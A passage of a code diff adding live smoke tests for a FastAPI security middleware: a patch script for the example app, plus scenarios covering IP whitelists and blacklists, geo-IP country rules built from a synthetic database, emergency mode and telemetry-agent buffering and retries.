+    server = ThreadingHTTPServer(("0.0.0.0", PORT), Handler)
+    server.serve_forever()
+
+
+if __name__ == "__main__":
+    main()

--- a/tests/live_smoke/patch_example_config.py
+++ b/tests/live_smoke/patch_example_config.py
@@ -1,0 +1,249 @@
+import sys
+from pathlib import Path
+
+APP_DIR = Path(__file__).resolve().parent / "stack" / "app"
+DEST = APP_DIR / "security.py"
+ROUTES_INIT = APP_DIR / "routes" / "__init__.py"
+MAIN_PY = APP_DIR / "main.py"
+SMOKE_EXTRA_ROUTE = APP_DIR / "routes" / "smoke_extra.py"
+
+_MARKER = "_smoke_apply_overrides"
+
+_PATCH = """
+
+def _smoke_on_block(request, payload):
+    import json as _smoke_json
+    import os as _smoke_os
+
+    path = _smoke_os.environ.get("SMOKE_ON_BLOCK_LOG")
+    if not path:
+        return
+    with open(path, "a", encoding="utf-8") as handle:
+        handle.write(_smoke_json.dumps(payload, default=str) + "\\n")
+
+
+def _smoke_on_error(stage, exc, context):
+    import json as _smoke_json
+    import os as _smoke_os
+
+    path = _smoke_os.environ.get("SMOKE_ON_ERROR_LOG")
+    if not path:
+        return
+    payload = {"stage": stage, "error": str(exc), "context": context}
+    with open(path, "a", encoding="utf-8") as handle:
+        handle.write(_smoke_json.dumps(payload, default=str) + "\\n")
+
+
+smoke_nonce = "unknown"
+
+
+def _smoke_apply_overrides() -> None:
+    import json as _smoke_json
+    import os as _smoke_os
+
+    global security_config, guard, smoke_nonce
+
+    config_path = _smoke_os.environ.get("SMOKE_CONFIG_PATH")
+    overrides: dict = {}
+    if config_path and _smoke_os.path.isfile(config_path):
+        text = Path(config_path).read_text(encoding="utf-8").strip()
+        if text:
+            overrides = _smoke_json.loads(text)
+
+    smoke_nonce = overrides.pop("smoke_nonce", smoke_nonce)
+    Path("/tmp/smoke_nonce.txt").write_text(smoke_nonce, encoding="utf-8")
+    smoke_geoip_db = overrides.pop("smoke_geoip_db", None)
+
+    merged = security_config.model_dump()
+    merged.update(overrides)
+    merged["on_block"] = _smoke_on_block
+    merged["on_error"] = _smoke_on_error
+    merged["exclude_paths"] = sorted(
+        {*merged.get("exclude_paths", []), "/smoke/nonce", "/smoke/agent-config"}
+    )
+
+    if smoke_geoip_db:
+        from guard_core.handlers.ipinfo_handler import IPInfoManager
+
+        merged["geo_ip_handler"] = IPInfoManager(
+            token="smoke-geoip-token",
+            db_path=Path(smoke_geoip_db),
+            max_age=merged.get("geo_ip_db_max_age", 86400),
+        )
+
+    security_config = SecurityConfig(**merged)
+    guard = SecurityDecorator(security_config)
+
+
+_smoke_apply_overrides()
+"""
+
+_SMOKE_EXTRA_ROUTE_SOURCE = """from fastapi import APIRouter, Query, Request
+
+from app.security import guard, security_config
+from guard.adapters import StarletteGuardRequest
+
+router = APIRouter(tags=["Smoke Framework"])
+
+_AGENT_CONFIG_SECRET_FIELDS = {
+    "api_key",
+    "project_encryption_key",
+    "payload_signing_secret",
+}
+
+
+@router.get("/smoke/nonce")
+async def smoke_nonce_route() -> dict[str, str]:
+    from app.security import smoke_nonce
+
+    return {"nonce": smoke_nonce}
+
+
+@router.get("/smoke/agent-config")
+async def smoke_agent_config_route() -> dict[str, object]:
+    agent_config = security_config.to_agent_config()
+    if agent_config is None:
+        return {"enabled": False}
+    data = agent_config.model_dump(exclude={"on_error"})
+    for field in _AGENT_CONFIG_SECRET_FIELDS:
+        if data.get(field):
+            data[field] = "***MASKED***"
+    return {"enabled": True, **data}
+
+
+@router.get("/smoke/authz-header")
+@guard.require_authorization_header(scheme="bearer")
+async def smoke_authz_header_route() -> dict[str, bool]:
+    return {"ok": True}
+
+
+@router.get("/smoke/detection-exclusion")
+@guard.detection_exclusion(params={"safe_marker"})
+async def smoke_detection_exclusion_route(
+    safe_marker: str = Query(None),
+) -> dict[str, str | None]:
+    return {"safe_marker": safe_marker}
+
+
+@router.get("/smoke/decorator-events")
+async def smoke_decorator_events_route(request: Request) -> dict[str, bool]:
+    guard_request = StarletteGuardRequest(request)
+    await guard.send_decorator_event(
+        event_type="smoke_decorator_event",
+        request=guard_request,
+        action_taken="observed",
+        reason="smoke framework probe",
+        decorator_type="smoke",
+    )
+    await guard.send_decorator_violation_event(
+        request=guard_request,
+        violation_type="smoke_violation",
+        reason="smoke framework probe",
+    )
+    await guard.send_access_denied_event(
+        request=guard_request,
+        reason="smoke framework probe",
+        decorator_type="smoke",
+    )
+    await guard.send_authentication_failed_event(
+        request=guard_request,
+        reason="smoke framework probe",
+        auth_type="smoke",
+    )
+    await guard.send_rate_limit_event(
+        request=guard_request,
+        limit=1,
+        window=60,
+    )
+    return {"triggered": True}
+
+
+async def smoke_startup_hook() -> None:
+    redis_handler = None
+    if security_config.enable_redis:
+        from guard_core.handlers.redis_handler import RedisManager
+
+        redis_handler = RedisManager(security_config)
+    await guard.initialize_behavior_tracking(redis_handler)
+"""
+
+_ROUTES_INIT_MARKER = "smoke_extra_router"
+
+_MAIN_PY_IMPORT_ANCHOR = "from app.security import guard, security_config\n"
+_MAIN_PY_IMPORT_INSERT = (
+    "from app.routes.smoke_extra import smoke_startup_hook\n"
+    "from app.security import guard, security_config\n"
+)
+_MAIN_PY_INCLUDE_ANCHOR = "app.include_router(test_router)\n"
+_MAIN_PY_INCLUDE_INSERT = (
+    "app.include_router(test_router)\napp.include_router(smoke_extra_router)\n"
+)
+_MAIN_PY_STARTUP_ANCHOR = (
+    '    logger.info("FastAPI Guard Advanced Example starting up...")\n'
+)
+_MAIN_PY_STARTUP_INSERT = (
+    '    logger.info("FastAPI Guard Advanced Example starting up...")\n'
+    "    await smoke_startup_hook()\n"
+)
+
+
+def _patch_security() -> None:
+    if not DEST.is_file():
+        raise FileNotFoundError(f"{DEST} does not exist; run copy_example_app.py first")
+    original = DEST.read_text(encoding="utf-8")
+    if _MARKER in original:
+        return
+    text = original
+    if "\nfrom pathlib import Path\n" not in text:
+        text = text.replace("import os\n", "import os\nfrom pathlib import Path\n", 1)
+    DEST.write_text(text + _PATCH, encoding="utf-8")
+
+
+def _write_smoke_extra_route() -> None:
+    SMOKE_EXTRA_ROUTE.write_text(_SMOKE_EXTRA_ROUTE_SOURCE, encoding="utf-8")
+
+
+def _patch_routes_init() -> None:
+    text = ROUTES_INIT.read_text(encoding="utf-8")
+    if _ROUTES_INIT_MARKER in text:
+        return
+    text = text.replace(
+        "from app.routes.rate_limiting import router as rate_router\n",
+        "from app.routes.rate_limiting import router as rate_router\n"
+        "from app.routes.smoke_extra import router as smoke_extra_router\n",
+        1,
+    )
+    text = text.replace(
+        '    "rate_router",\n',
+        '    "rate_router",\n    "smoke_extra_router",\n',
+        1,
+    )
+    ROUTES_INIT.write_text(text, encoding="utf-8")
+
+
+def _patch_main() -> None:
+    text = MAIN_PY.read_text(encoding="utf-8")
+    if "smoke_extra_router" in text and "smoke_startup_hook" in text:
+        return
+    text = text.replace(
+        "    test_router,\n)",
+        "    smoke_extra_router,\n    test_router,\n)",
+        1,
+    )
+    text = text.replace(_MAIN_PY_IMPORT_ANCHOR, _MAIN_PY_IMPORT_INSERT, 1)
+    text = text.replace(_MAIN_PY_INCLUDE_ANCHOR, _MAIN_PY_INCLUDE_INSERT, 1)
+    text = text.replace(_MAIN_PY_STARTUP_ANCHOR, _MAIN_PY_STARTUP_INSERT, 1)
+    MAIN_PY.write_text(text, encoding="utf-8")
+
+
+def patch() -> None:
+    _patch_security()
+    _write_smoke_extra_route()
+    _patch_routes_init()
+    _patch_main()
+
+
+if __name__ == "__main__":
+    patch()
+    print(f"patched {DEST}")
+    sys.exit(0)

--- a/tests/live_smoke/registry.py
+++ b/tests/live_smoke/registry.py
@@ -1,0 +1,44 @@
+from __future__ import annotations
+
+from collections.abc import Callable
+from dataclasses import dataclass, field
+from typing import TYPE_CHECKING, Any
+
+if TYPE_CHECKING:
+    from tests.live_smoke.driver import ScenarioContext
+
+ScenarioFunc = Callable[["ScenarioContext"], None]
+
+
+@dataclass(frozen=True)
+class Scenario:
+    name: str
+    func: ScenarioFunc
+    covers: frozenset[str]
+    config: dict[str, Any] = field(default_factory=dict)
+
+
+SCENARIOS: list[Scenario] = []
+
+
+def scenario(
+    *, covers: set[str], config: dict[str, Any] | None = None
+) -> Callable[[ScenarioFunc], ScenarioFunc]:
+    def register(func: ScenarioFunc) -> ScenarioFunc:
+        SCENARIOS.append(
+            Scenario(
+                name=func.__name__,
+                func=func,
+                covers=frozenset(covers),
+                config=dict(config or {}),
+            )
+        )
+        return func
+
+    return register
+
+
+def config_key(config: dict[str, Any]) -> str:
+    import json
+
+    return json.dumps(config, sort_keys=True, default=str)

--- a/tests/live_smoke/scenarios/__init__.py
+++ b/tests/live_smoke/scenarios/__init__.py
@@ -1,0 +1,29 @@
+import importlib
+import os
+import pkgutil
+
+
+def _discovered_modules() -> list[str]:
+    return sorted(
+        module.name
+        for module in pkgutil.iter_modules(__path__)
+        if not module.name.startswith("_")
+    )
+
+
+def _selected_modules() -> list[str]:
+    discovered = _discovered_modules()
+    only = os.environ.get("LIVE_SMOKE_ONLY_MODULES", "").strip()
+    if not only:
+        return discovered
+    wanted = {name.strip() for name in only.split(",") if name.strip()}
+    unknown = wanted - set(discovered)
+    if unknown:
+        raise ImportError(f"Unknown live-smoke scenario modules: {sorted(unknown)}")
+    return [name for name in discovered if name in wanted]
+
+
+LOADED_MODULES: tuple[str, ...] = tuple(_selected_modules())
+
+for _name in LOADED_MODULES:
+    importlib.import_module(f"{__name__}.{_name}")

--- a/tests/live_smoke/scenarios/access_control.py
+++ b/tests/live_smoke/scenarios/access_control.py
@@ -1,0 +1,350 @@
+import os
+from pathlib import Path
+
+from tests.live_smoke.driver import STACK_DIR, ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+CLIENT_IP = "192.168.50.50"
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+
+_TYPE_STRING = 2
+_TYPE_UINT16 = 5
+_TYPE_UINT32 = 6
+_TYPE_MAP = 7
+_TYPE_UINT64 = 9
+_TYPE_ARRAY = 11
+_NODE = "node"
+_DATA = "data"
+
+
+def _mmdb_control_byte(data_type: int, size: int) -> bytes:
+    if data_type <= 7:
+        return bytes([(data_type << 5) | size])
+    return bytes([size, data_type - 7])
+
+
+def _mmdb_encode_string(value: str) -> bytes:
+    payload = value.encode("utf-8")
+    return _mmdb_control_byte(_TYPE_STRING, len(payload)) + payload
+
+
+def _mmdb_encode_uint(data_type: int, value: int, byte_len: int) -> bytes:
+    raw = value.to_bytes(byte_len, "big").lstrip(b"\x00")
+    return _mmdb_control_byte(data_type, len(raw)) + raw
+
+
+def _mmdb_country_record(country: str) -> bytes:
+    key = _mmdb_encode_string("country")
+    value = _mmdb_encode_string(country)
+    return _mmdb_control_byte(_TYPE_MAP, 1) + key + value
+
+
+def _mmdb_metadata(node_count: int) -> bytes:
+    entries: dict[str, bytes] = {
+        "node_count": _mmdb_encode_uint(_TYPE_UINT32, node_count, 4),
+        "record_size": _mmdb_encode_uint(_TYPE_UINT16, 24, 2),
+        "ip_version": _mmdb_encode_uint(_TYPE_UINT16, 4, 2),
+        "database_type": _mmdb_encode_string("guard-core-live-smoke"),
+        "languages": _mmdb_control_byte(_TYPE_ARRAY, 1) + _mmdb_encode_string("en"),
+        "binary_format_major_version": _mmdb_encode_uint(_TYPE_UINT16, 2, 2),
+        "binary_format_minor_version": _mmdb_encode_uint(_TYPE_UINT16, 0, 2),
+        "build_epoch": _mmdb_encode_uint(_TYPE_UINT64, 1_700_000_000, 8),
+        "description": (
+            _mmdb_control_byte(_TYPE_MAP, 1)
+            + _mmdb_encode_string("en")
+            + _mmdb_encode_string("guard-core-live-smoke")
+        ),
+    }
+    body = _mmdb_control_byte(_TYPE_MAP, len(entries))
+    for key, encoded_value in entries.items():
+        body += _mmdb_encode_string(key) + encoded_value
+    return body
+
+
+def _build_mmdb(entries: dict[str, str]) -> bytes:
+    nodes: list[list[tuple[str, int] | None]] = [[None, None]]
+    leaf_countries: dict[tuple[int, int], str] = {}
+
+    def insert(ip: str, country: str) -> None:
+        octets = [int(part) for part in ip.split(".")]
+        bits = "".join(f"{octet:08b}" for octet in octets)
+        node_idx = 0
+        for position, bit in enumerate(bits):
+            branch = int(bit)
+            if position == len(bits) - 1:
+                nodes[node_idx][branch] = (_DATA, 0)
+                leaf_countries[(node_idx, branch)] = country
+                continue
+            child = nodes[node_idx][branch]
+            if isinstance(child, tuple) and child[0] == _NODE:
+                node_idx = child[1]
+                continue
+            nodes.append([None, None])
+            child_idx = len(nodes) - 1
+            nodes[node_idx][branch] = (_NODE, child_idx)
+            node_idx = child_idx
+
+    for ip, country in entries.items():
+        insert(ip, country)
+
+    node_count = len(nodes)
+
+    data_section = b""
+    data_offsets: dict[str, int] = {}
+    for country in entries.values():
+        if country not in data_offsets:
+            data_offsets[country] = len(data_section)
+            data_section += _mmdb_country_record(country)
+
+    def resolve(node_idx: int, branch: int, value: tuple[str, int] | None) -> int:
+        if value is None:
+            return node_count
+        kind, payload = value
+        if kind == _NODE:
+            return payload
+        country = leaf_countries[(node_idx, branch)]
+        return node_count + 16 + data_offsets[country]
+
+    tree = bytearray()
+    for idx, (left, right) in enumerate(nodes):
+        tree += resolve(idx, 0, left).to_bytes(3, "big")
+        tree += resolve(idx, 1, right).to_bytes(3, "big")
+
+    return (
+        bytes(tree)
+        + b"\x00" * 16
+        + data_section
+        + b"\xab\xcd\xefMaxMind.com"
+        + _mmdb_metadata(node_count)
+    )
+
+
+_GEO_DIR = STACK_DIR / "scenario_data"
+_GEO_US_HOST_PATH = _GEO_DIR / "geo_smoke_us.mmdb"
+_GEO_CN_HOST_PATH = _GEO_DIR / "geo_smoke_cn.mmdb"
+GEO_US_CONTAINER_PATH = "/smoke/geo_smoke_us.mmdb"
+GEO_CN_CONTAINER_PATH = "/smoke/geo_smoke_cn.mmdb"
+
+
+def _write_geo_fixtures() -> None:
+    _GEO_DIR.mkdir(parents=True, exist_ok=True)
+    _GEO_US_HOST_PATH.write_bytes(_build_mmdb({CLIENT_IP: "US"}))
+    _GEO_CN_HOST_PATH.write_bytes(_build_mmdb({CLIENT_IP: "CN"}))
+
+
+def _geo_fixtures_path(path: Path) -> str:
+    return str(path)
+
+
+if os.environ.get("LIVE_SMOKE") == "1":
+    _write_geo_fixtures()
+
+
+WHITELIST_CONFIG = {
+    "whitelist": [CLIENT_IP, "127.0.0.1"],
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+BLACKLIST_CONFIG = {
+    "blacklist": [CLIENT_IP],
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"whitelist", "ip_security"}, config=WHITELIST_CONFIG)
+def global_whitelist_allows_the_client_ip(ctx: ScenarioContext) -> None:
+    response = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert response.status_code == 200
+
+
+@scenario(covers={"blacklist"}, config=BLACKLIST_CONFIG)
+def global_blacklist_blocks_the_client_ip(ctx: ScenarioContext) -> None:
+    response = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert response.status_code == 403
+
+
+ACCESS_DECORATORS_CONFIG = {
+    "blocked_user_agents": ["smoke-blocked-agent"],
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"blocked_user_agents", "block_user_agents", "user_agent", "require_ip"},
+    config=ACCESS_DECORATORS_CONFIG,
+)
+def user_agent_and_require_ip_decorators_block_as_configured(
+    ctx: ScenarioContext,
+) -> None:
+    client = ctx.client
+
+    blocked_global = client.get(
+        "/basic/ip",
+        params={"q": "hello"},
+        headers={"User-Agent": "smoke-blocked-agent/1.0"},
+    )
+    assert blocked_global.status_code == 403
+
+    allowed_global = client.get(
+        "/basic/ip", params={"q": "hello"}, headers={"User-Agent": "curl/8.0"}
+    )
+    assert allowed_global.status_code == 200
+
+    blocked_decorator = client.get(
+        "/content/no-bots", headers={"User-Agent": "some-crawler-9000"}
+    )
+    assert blocked_decorator.status_code == 403
+
+    allowed_decorator = client.get(
+        "/content/no-bots", headers={"User-Agent": "curl/8.0"}
+    )
+    assert allowed_decorator.status_code == 200
+
+    blocked_ip = client.get("/access/ip-whitelist")
+    assert blocked_ip.status_code == 403
+
+
+CLOUD_CONFIG = {
+    "cloud_ip_refresh_interval": 60,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={
+        "block_clouds",
+        "block_cloud_providers",
+        "cloud_ip_refresh_interval",
+        "cloud_ip_store",
+        "cloud_provider",
+        "cloud_ip_refresh",
+    },
+    config=CLOUD_CONFIG,
+)
+def cloud_provider_checks_do_not_block_a_private_ip(ctx: ScenarioContext) -> None:
+    client = ctx.client
+    for path in ("/access/no-cloud", "/access/no-aws", "/basic/ip"):
+        response = client.get(path, params={"q": "hello"})
+        assert response.status_code == 200, (path, response.status_code)
+
+    keys = wait_until(lambda: ctx.redis.keys("smoke:cloud_ip_v2:*"), timeout=15.0)
+    assert keys, "no cached cloud IP ranges were written by cloud_ip_store"
+
+
+EMERGENCY_BLOCKED_CONFIG = {
+    "emergency_mode": True,
+    "emergency_whitelist": [],
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"emergency_mode"}, config=EMERGENCY_BLOCKED_CONFIG)
+def emergency_mode_blocks_non_whitelisted_traffic(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+    response = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert response.status_code == 503
+
+    lines = ctx.stack.logs.lines_since(mark)
+    assert any("[EMERGENCY MODE] Access denied" in line for line in lines)
+
+
+EMERGENCY_WHITELIST_CONFIG = {
+    "emergency_mode": True,
+    "emergency_whitelist": [CLIENT_IP],
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"emergency_whitelist"}, config=EMERGENCY_WHITELIST_CONFIG)
+def emergency_whitelist_allows_listed_ip_through(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+    response = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert response.status_code == 200
+
+    lines = ctx.stack.logs.lines_since(mark)
+    assert any(
+        "[EMERGENCY MODE] Allowed access for whitelisted IP" in line for line in lines
+    )
+
+
+GEO_CONFIG_ALLOW = {
+    "blocked_countries": ["ZZ"],
+    "ipinfo_token": "smoke-token",
+    "ipinfo_db_path": _geo_fixtures_path(Path(GEO_US_CONTAINER_PATH)),
+    "log_country_check_level": "ERROR",
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={
+        "allow_countries",
+        "block_countries",
+        "log_country_check_level",
+        "ipinfo_token",
+        "ipinfo_db_path",
+    },
+    config=GEO_CONFIG_ALLOW,
+)
+def geo_country_rules_allow_and_log_a_resolved_country(ctx: ScenarioContext) -> None:
+    client = ctx.client
+    mark = ctx.stack.logs.mark()
+
+    allowed = client.get("/access/country-allow", params={"q": "hello"})
+    assert allowed.status_code == 200
+
+    passthrough = client.get("/access/country-block", params={"q": "hello"})
+    assert passthrough.status_code == 200
+
+    plain = client.get("/basic/ip", params={"q": "hello"})
+    assert plain.status_code == 200
+
+    lines = ctx.stack.logs.lines_since(mark)
+    assert any(
+        "ERROR" in line and "IP not from blocked or whitelisted country" in line
+        for line in lines
+    )
+
+
+GEO_CONFIG_BLOCK = {
+    "blocked_countries": ["CN"],
+    "ipinfo_token": "smoke-token",
+    "ipinfo_db_path": _geo_fixtures_path(Path(GEO_CN_CONTAINER_PATH)),
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"block_countries", "allow_countries", "blocked_countries"},
+    config=GEO_CONFIG_BLOCK,
+)
+def geo_country_rules_block_a_matching_resolved_country(ctx: ScenarioContext) -> None:
+    client = ctx.client
+
+    blocked_route = client.get("/access/country-block", params={"q": "hello"})
+    assert blocked_route.status_code == 403
+
+    mismatched_allow = client.get("/access/country-allow", params={"q": "hello"})
+    assert mismatched_allow.status_code == 403
+
+    blocked_global = client.get("/basic/ip", params={"q": "hello"})
+    assert blocked_global.status_code == 403
+
+
+GEO_CONFIG_WHITELIST = {
+    "whitelist_countries": ["US"],
+    "ipinfo_token": "smoke-token",
+    "ipinfo_db_path": _geo_fixtures_path(Path(GEO_US_CONTAINER_PATH)),
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"whitelist_countries"}, config=GEO_CONFIG_WHITELIST)
+def whitelist_countries_allows_a_matching_resolved_country(
+    ctx: ScenarioContext,
+) -> None:
+    mark = ctx.stack.logs.mark()
+    response = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert response.status_code == 200
+
+    lines = ctx.stack.logs.lines_since(mark)
+    assert any("IP from whitelisted country" in line for line in lines)

--- a/tests/live_smoke/scenarios/agent_telemetry.py
+++ b/tests/live_smoke/scenarios/agent_telemetry.py
@@ -1,0 +1,353 @@
+import base64
+import time
+from typing import Any
+
+from tests.live_smoke.driver import ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+AGENT_API_KEY = "smoke-agent-key"
+AGENT_ENDPOINT = "http://agent-stub:8090"
+UNREACHABLE_ENDPOINT = "http://127.0.0.1:9"
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+BADBOT_HEADERS = {"User-Agent": "badbot"}
+ENCRYPTION_KEY = base64.urlsafe_b64encode(b"0" * 32).decode()
+
+
+def _reset_agent(ctx: ScenarioContext) -> None:
+    ctx.agent.post("/_debug/reset")
+
+
+def _debug_state(ctx: ScenarioContext) -> dict[str, Any] | None:
+    response = ctx.agent.get("/_debug/state")
+    if response.status_code != 200:
+        return None
+    return dict(response.json())
+
+
+def _find_event(state: dict[str, Any], event_type: str) -> dict[str, Any] | None:
+    for event in state.get("events", []):
+        if event.get("event_type") == event_type:
+            return dict(event)
+    return None
+
+
+def _state_with_event_type(
+    ctx: ScenarioContext, event_type: str
+) -> dict[str, Any] | None:
+    state = _debug_state(ctx)
+    if state is None or _find_event(state, event_type) is None:
+        return None
+    return state
+
+
+def _state_with_metric_type(
+    ctx: ScenarioContext, metric_type: str
+) -> dict[str, Any] | None:
+    state = _debug_state(ctx)
+    if state is None:
+        return None
+    has_metric = any(
+        metric.get("metric_type") == metric_type for metric in state.get("metrics", [])
+    )
+    return state if has_metric else None
+
+
+def _lines_containing(ctx: ScenarioContext, mark: str, needle: str) -> list[str]:
+    return [line for line in ctx.stack.logs.lines_since(mark) if needle in line]
+
+
+def _rule_apply_count(ctx: ScenarioContext) -> int:
+    text = ctx.stack.logs.full_text()
+    boundary = text.rfind("Starting gunicorn")
+    current_boot = text[boundary:] if boundary >= 0 else text
+    return current_boot.count("Applying dynamic rules: smoke-rule v")
+
+
+def _state_with_status(ctx: ScenarioContext) -> dict[str, Any] | None:
+    state = _debug_state(ctx)
+    if state is None or not state.get("status"):
+        return None
+    return state
+
+
+AGENT_ENRICHMENT_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_flush_interval": 2,
+    "agent_project_id": "smoke-enrich-project",
+    "enable_enrichment": True,
+    "agent_compression_enabled": True,
+    "agent_compression_threshold": 1,
+    "agent_enable_events": True,
+    "agent_enable_metrics": False,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={
+        "agent_project_id",
+        "enable_enrichment",
+        "agent_compression_enabled",
+        "agent_compression_threshold",
+        "agent_enable_events",
+        "agent_enable_metrics",
+    },
+    config=AGENT_ENRICHMENT_CONFIG,
+)
+def agent_enrichment_metadata_and_compressed_delivery(ctx: ScenarioContext) -> None:
+    _reset_agent(ctx)
+
+    ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+    state = wait_until(
+        lambda: _state_with_event_type(ctx, "user_agent_blocked"), timeout=20.0
+    )
+    assert state is not None, "no user_agent_blocked event reached the agent stub"
+
+    event = _find_event(state, "user_agent_blocked")
+    assert event is not None
+    metadata = event.get("metadata") or {}
+    assert metadata.get("guard.project_id") == "smoke-enrich-project", metadata
+    assert metadata.get("guard.threat_score") == 30, metadata
+    assert "guard.service.name" in metadata, metadata
+    assert "guard.behavior.recent_event_count" in metadata, metadata
+    assert state.get("metrics") == [], (
+        "agent_enable_metrics=False should keep the metrics batch empty"
+    )
+
+
+AGENT_MUTED_TYPES_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_flush_interval": 2,
+    "agent_enable_events": True,
+    "agent_enable_metrics": True,
+    "muted_event_types": ["user_agent_blocked"],
+    "muted_metric_types": ["request_count"],
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"muted_event_types", "muted_metric_types"},
+    config=AGENT_MUTED_TYPES_CONFIG,
+)
+def agent_muted_types_suppress_telemetry(ctx: ScenarioContext) -> None:
+    _reset_agent(ctx)
+
+    ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+    state = wait_until(
+        lambda: _state_with_metric_type(ctx, "response_time"), timeout=20.0
+    )
+    assert state is not None, "response_time metric never reached the agent stub"
+
+    assert not any(
+        event.get("event_type") == "user_agent_blocked"
+        for event in state.get("events", [])
+    ), "muted_event_types=['user_agent_blocked'] failed to suppress the event"
+    assert not any(
+        metric.get("metric_type") == "request_count"
+        for metric in state.get("metrics", [])
+    ), "muted_metric_types=['request_count'] failed to suppress the metric"
+
+
+AGENT_STRICT_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_buffer_size": 0,
+    "agent_strict": False,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"agent_strict", "agent_buffer_size"},
+    config=AGENT_STRICT_CONFIG,
+)
+def agent_strict_false_degrades_gracefully(ctx: ScenarioContext) -> None:
+    response = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert response.status_code == 200, (
+        "agent_strict=False must keep the app healthy even when agent "
+        "construction fails (agent_buffer_size=0 is invalid)"
+    )
+
+    log_text = ctx.stack.logs.full_text()
+    assert "Failed to initialize Guard Agent" in log_text
+    assert "Continuing without agent functionality" in log_text
+
+
+AGENT_WATERMARK_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_buffer_size": 10,
+    "agent_high_watermark_ratio": 0.2,
+    "agent_flush_interval": 120,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"agent_high_watermark_ratio"},
+    config=AGENT_WATERMARK_CONFIG,
+)
+def agent_high_watermark_triggers_early_flush(ctx: ScenarioContext) -> None:
+    _reset_agent(ctx)
+
+    ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+    ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+    state = wait_until(
+        lambda: _state_with_event_type(ctx, "user_agent_blocked"), timeout=15.0
+    )
+    assert state is not None, (
+        "agent_high_watermark_ratio=0.2 on a buffer_size=10 buffer should flush "
+        "after 2 buffered events, well before the 120s flush_interval"
+    )
+
+
+AGENT_DROP_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": AGENT_ENDPOINT,
+    "agent_buffer_size": 2,
+    "agent_buffer_overflow_policy": "drop",
+    "agent_high_watermark_ratio": 2.0,
+    "agent_flush_interval": 120,
+    "auto_ban_threshold": 1000,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"agent_buffer_overflow_policy"}, config=AGENT_DROP_CONFIG)
+def agent_buffer_overflow_policy_drops_oldest_event(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+
+    for _ in range(5):
+        ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+    dropped = wait_until(
+        lambda: _lines_containing(ctx, mark, "dropping oldest event"), timeout=15.0
+    )
+    assert dropped, (
+        "agent_buffer_overflow_policy='drop' should evict the oldest event once "
+        "agent_buffer_size=2 fills up; agent_high_watermark_ratio=2.0 and "
+        "agent_flush_interval=120 keep any flush from draining the buffer first"
+    )
+
+
+AGENT_RETRY_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": AGENT_API_KEY,
+    "agent_endpoint": UNREACHABLE_ENDPOINT,
+    "agent_buffer_size": 10,
+    "agent_high_watermark_ratio": 0.1,
+    "agent_retry_attempts": 1,
+    "agent_backoff_factor": 2.0,
+    "agent_flush_interval": 120,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"agent_retry_attempts", "agent_backoff_factor"},
+    config=AGENT_RETRY_CONFIG,
+)
+def agent_retry_attempts_and_backoff_factor_are_bounded(
+    ctx: ScenarioContext,
+) -> None:
+    mark = ctx.stack.logs.mark()
+    start = time.monotonic()
+
+    ctx.client.get("/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS)
+
+    attempt_two = wait_until(
+        lambda: _lines_containing(ctx, mark, "Attempt 2 failed for events"),
+        timeout=40.0,
+    )
+    elapsed = time.monotonic() - start
+    assert attempt_two, "agent_retry_attempts=1 should have produced a 2nd attempt"
+    assert elapsed >= 1.0, (
+        f"agent_backoff_factor=2.0 should delay the 2nd attempt by ~2s, "
+        f"observed {elapsed:.2f}s total"
+    )
+    assert not _lines_containing(ctx, mark, "Attempt 3 failed for events"), (
+        "agent_retry_attempts=1 should cap retries at 2 total attempts"
+    )
+
